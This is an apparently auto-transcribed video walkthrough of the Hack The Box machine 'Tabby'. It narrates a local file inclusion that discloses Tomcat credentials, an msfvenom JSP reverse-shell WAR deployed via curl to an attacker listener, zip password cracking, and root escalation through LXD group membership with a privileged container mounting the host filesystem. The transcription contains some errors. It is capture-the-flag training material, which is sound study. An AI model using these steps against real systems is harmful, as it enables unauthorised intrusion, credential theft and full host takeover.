What's going on? Welcome back. In today's video, we are going to tackle down Tabby, which has retired yesterday from HackTheBack. The machine is Linux. In this machine, we are going to exploit local file inclusion vulnerability in a web server here, the Apache web server, mega hosting, and the local file inclusion vulnerability will lead us to disclose plain text credentials to access the Tomcat, Apache Tomcat. Once we are inside the admin panel of Tomcat, we will upload a payload to give us a reverse shell. Now, once we get the reverse shell, the privilege escalation will be done through the exploitation of a member, being a member who is a user who is a member of the LXD group, which will explain what that means later. Okay, so the nrap scan appears here. As you can see, we have 22 SSH, we have 80, and we have 80. So basically, the first thing we do is we add this to the host file. So sudo etc hosts. So here we go down and we add the IP 196.194, and we type tabby.http. Right, now let's access the web server from the browser. So in here we type Tabby or as you can see, the web page title is Mega Hosting, which seems to be a hosting company for people who want to build their websites. As you can see, if you click on Home, plans dedicated, so there is nothing to show in here. Oh, so this redirects to another domain, megahosting.http. As you can see, we have a news file and the parameter is file. So news.php and the parameter is file. And here we have a statement which triggers our thought process to remember local file inclusion. But before that, we need to add this to the host file so we can navigate easily. So again, add the same IP, megahosting.http. Right. All right. So here we have the page has opened, and as you can see, we apologize to all of our customers for the previous data breach. We have changed the site to remove this tool and have invested heavily in more secure servers. Very clear. Now, file equal statement. Now, what you can do here, you can try variations of local file inclusion. For example, we can try etc password and see if we get something. And indeed, we get the content of the password file, which means that the web server is vulnerable to local file inclusion, specifically the file parameter. There is no input sanitization there is no sanitization for the input taken by the user. So we can do here, if you go back to nmap scan, we can see here that we have Apache Tomcat, right, running on the same server. So if you access this, Tabby HTTP 8080. This is the web page, right, of the Tomcat. It's the basic one. As you can see here, for security reasons, using the manager web app is restricted to users with the role and manager GUI. The host manager web app is restricted to users with the role admin GUI. Users are defined in etc Tomcat 9 Tomcat users. So this is a very clear disclosure of the configuration file of the user's XML file. And pretty much sometimes, or most of the time this file contains plain text credentials that give you admin access to the GUI interface. So here if we type host manager, as you can see, it asks for the username and password. We can get these credentials by going to the host file, the configuration file of the user, tomcat user.xml. But as you all know, guys, the tomcat users file, normally it exists not in etc tomcat 9, but in tomcat 9 config like this, I guess. So here it is user share tomcat 9 conf tomcat users XML. Let's see that in the documentation of Tomcat. So here we type Tomcat users XML Tomcat 9. So as you can see here, it is this is the Catalina page, which means user share Tomcat 9, right? And then we type conf Tomcat users. But the case here is different. We have Tomcat 9 coming after etc. Yes, the case here is different a bit. So what we can do here, we can go back to documentation and try to access this one. So what we can do here, we can go back to the file inclusion, local file inclusion, and take advantage of this. So you can type user share tomcat 9 conf tomcat users XML. So this yields nothing. If we replaced conf with etc, also this yields nothing. Let's go back. So here it says etc 9. Again, we get nothing. And we have here, no, this should be Tomcat 9. And then we type etc instead of config conf, and we type the slash. Let's see if this works. So there is nothing in here. If we try to view the page source, we go down. Oh, yep. So here we have role name admin GUI, role name manager script, username is Tomcat, and the password is this one. Seems like these are the working credentials to access the admin interface. Right, so let's go back, and here we type, let's type host manager Tomcat, and take the password as it. So this is the Tomcast virtual host manager, and all we have to do now is to upload our payload. But seems like the package manager is not here. We need to deploy through the upload function, but we don't have the option to do that here. No idea why. Maybe this is because the permissions we are assigned to. We don't have permission to do that. All right, so this is the Tomcat Virtual Host Manager admin page, and I can't see any option to deploy the payload through the GUI interface. So in order to do that, we're going to need to use a HTTP post request. So we can do that if you go to Google and type Apache Tomcat 9 HTTP posts. All right, let's click on that. And here we see remotely. So basically here we can deploy a new application archive remotely. All we have to do is to follow this path. Okay, so the first thing we do, guys, is to create a payload before uploading or before doing anything with the upload. So basically we go down and we type sudo msf venom-p java shell. So let's generate the payload now that will be uploaded. So sudo msf venom-p, it's going to be java gsp shell reverse tcp. Okay, now the lhost. So we have 10, 10, 14, 3. So 10, 10, 14, 3. And the L port, my preferred port for 545. Dash F, it's going to be war file. And we output this to payload.war. Right, so the payload has been generated and it is right here. Now the rest is uploading the payload. We're going to follow the instructions here. We're going to specify the URL as such, but instead of /foo, we're going to put /payload.war, our payload. And we will use the credentials we have got. So how to do that? We're going to use curl sudo curl -- user tomcat, and the password is this. And now we will use the upload file. The file name is payload.war, and we specify the path HTTP. So basically the path will be, let's go back, is manager text deploy. Right, so let's take this portion. And we type here tabby.htp. So right, the path will be payload.war. So let's see. The application has been deployed. Now, in order to trigger the payload, we need to set up first the listener to cache the reverse shell. So we jump right here, clear sudo, not sudo, msf console. So here we go back and trigger the payload by navigating to the path just like that. Cancel this. We type payload.war. Don't click enter unless you have established the listener. Use set 14.3. I hope it is the same. Let me make sure. Keep this here. Okay. Set run. And here, go back. Enter. So we have received the first reverse shell. Command shell session 1 opened, ID. We are right now Tomcat, and most of the time the web server user like Tomcat or data is low privileged user. So we can do here, we first want to escalate our privileges. So in this machine, if we type ls, we have the conf lib logs policy app pwd where we are in var lib tomcat 9. So let's go to the web server path directory, HTML, see what we have there. So we have assets, favicon files, index, logo. We go to files. We have backup, archive, revoked certs. This one seems interesting. It could be the content of the whole website has been compressed, like to download it and clone it or whatever, but it is worth discovering. So let's first find the version of the operating system. Uname -a Alex54. Okay. Sudo -l. Oh, sudo -l -i. Okay, nothing. Right. So we have to take this one. In order to download this, let's split the view here. Okay, what we're going to do now, we're going to download the backup file to our local machine, try to crack it, see what's in there. But before that, let's have a qualified shell. Okay, fine. Now, in order to transfer this file to our local machine, the only way is to grab it, or let's see if we can take it from the browser. So basically here, HTTP, Tabby. If we type here files and the name, so this is the file. So this is the backup file. I'm going to put it in the desktop. Okay, seems like you don't want to respond. I'm going to use the command line. CP home backup 6 to home. So we have the backup file in here. Unzip, sudo unzip 16. So it asks for the password, and it is a zip file. So we have to use some tool to crack it. I remember I had a tool from the developer to crack the zip files, but I don't think I have it here. So I'm going to use another tool called fcrack. Fcrack zip. We have to specify. Okay, fine. So we have this. Okay, so how do you use this? Let's type fcrack zip, and we type -d, D for dictionary mode, -p to specify the user, the password list or the word list. So user share fuck you. Okay, and we specify the file, and we hit enter. So this is the password. Let's grab this and go back to our shell. So basically cat etc password. We have a user ASH. If we type su ASH, paste the password, and you are ASH sudo-l sudo-i read-only file system. So it seems like we don't have permission to run sudo here. Okay, type ID. So why ASH, or what does it mean when ASH is a member of LXD? It means that we can do privilege escalation right from this, given this fact. Why? LXD, guys, is a root process, let me say, that lets you do functions and processes on the system without asking for any privileges. So say that ASH can do whatever he likes using the LXD, right? Because LXD doesn't ask for your permissions, doesn't ask for your privileges. It does carry out root processes, or in the context of root. So basically what we will do here, we will exploit LXD and create a container, LCX, to mount the root file system. Okay, I'm going to put the link that explains how LXD exploitation works. So you don't need to worry about where did you get this from. Okay. Right, so now let's first go to temp. Okay, make sure we don't see any popping permission denied stuff. And let's go to browser and put this URL. This URL has the exploits that we will use for LXD privilege escalation. LXD Alpine Linux Image Builder. This script provides a way to create Alpine Linux images for their use with LXD. So we're going to first take this to our local machine. Here, sudo git. So cd lxd. Now we will build this using this command, sudo bash build. Failed to, we need to be root. So, okay, fine. Now cd home. Okay, cd lxt bash build. So it has finished, and as you can see, there is a tar file has been created. Now all you have to do is to transfer this tar file into the remote host. Specifically, I would choose temp to prevent any permission denied errors from being spilled out. So basically, transfer this. So what we'll do here, we will say sudo cp alpine to home. Actually, I don't need sudo. I don't know why. I just get used to it. Okay. Right, now let's so for my username, I don't need root anymore. Okay, sudo -3-m. Download this to the remote host right here, wget. What was the name of the file? Let's see if there is autocomplete. No autocomplete. Okay, enter. And now we download the tar file. Okay. So the next thing is we have this image that we have built, right? We will need to mount this image, or we add it to LXT. So how can we do that? We can type LXT import. LXT stands for Linux Container Image Import. Specify the name. And then dash dash alias. Specify the name of the image that we are adding to the LXT. I'm going to name it Tabby. Right. Error, no such file or directory. How is this possible? All right, let's do that. cp temp, and we take the file name, copy it to the home directory, ash or home ash. So right now we have it here. Let's try it now. Oh, so this worked. So from the home directory it worked, from the temp directory it didn't work, no idea why. Maybe it has got to do with the, actually I didn't understand why it didn't work from the temp directory. Okay, after we have imported the image into the LXC container, let's list the images to see if our image has been imported successfully. LXC, list container images, and we type list. So our image named Tabby, and it is not, it is here. Okay, let's see. Yes, it is here actually. Look, it is Tabby, and this is the name. All right. Now the next thing is we perform the following commands to add it to the security container and execute the commands. So lxc init, the name is Tabby, ignite -c security privilege. True. No storage pool found. Please create a new storage pool. Let's do the initialization first. lxd init initialized. I'm going to say yes, use the default clustering. What name should be used to identify the node in this cluster? Okay, Tabby is correct. IP address, leave it as the same. Are you joining an existing cluster? No. Set up password authentication of the cluster. No. Do you want to configure a new local storage pool? Yes. Name of the storage backend to use. I'm going to choose BTRFS. Create a new BTRFS tool. Yes. Pool. Would you like to use an existing block device? No. Size in gigabyte of the new loop device. Okay. We don't configure a new remote storage pool. No. No. It's like a questionnaire. Okay, let's try now. Use our image. LXC init Tabby ignite -c security privilege. True. Unknown configuration key security.privileged. I think okay. Oh, LXC. What's going on here? I don't know why we are facing these problems. Finally. Okay, now the next thing we specify that we want to mount the root file system to the container. We can do that by adding the device lxc config device add ignite, let's say Tabby Tabby D stands for Tabby device, and disk, specify the source. The source will be everything, and then the destination or the path will be mount root recursive equal true. Okay, now let's start the container lxc start ignite, and the next thing is we execute the bin bash. That's the exploitation part. lxc execute ignite bin sh id, and you are the root user. That's how it works. Let's grab the root flag. You're not going to type cd root, you're going to type cd mount root, because that's the path or the file system we have mounted. So type cd mnt root. That's the file system now that we have mounted. Now we go to root ls cat, and this is the what we call it, the hash, the flag. Okay, so that's how it works. Pretty much unique stuff. Not unique stuff. I mean, it's like the exploitation of LXD. I didn't know how to do it before, so I'm gonna put the link in the video description so you can see how LXD exploitation or privilege escalation works. So that was it. Thank you for watching, and see you in the next video.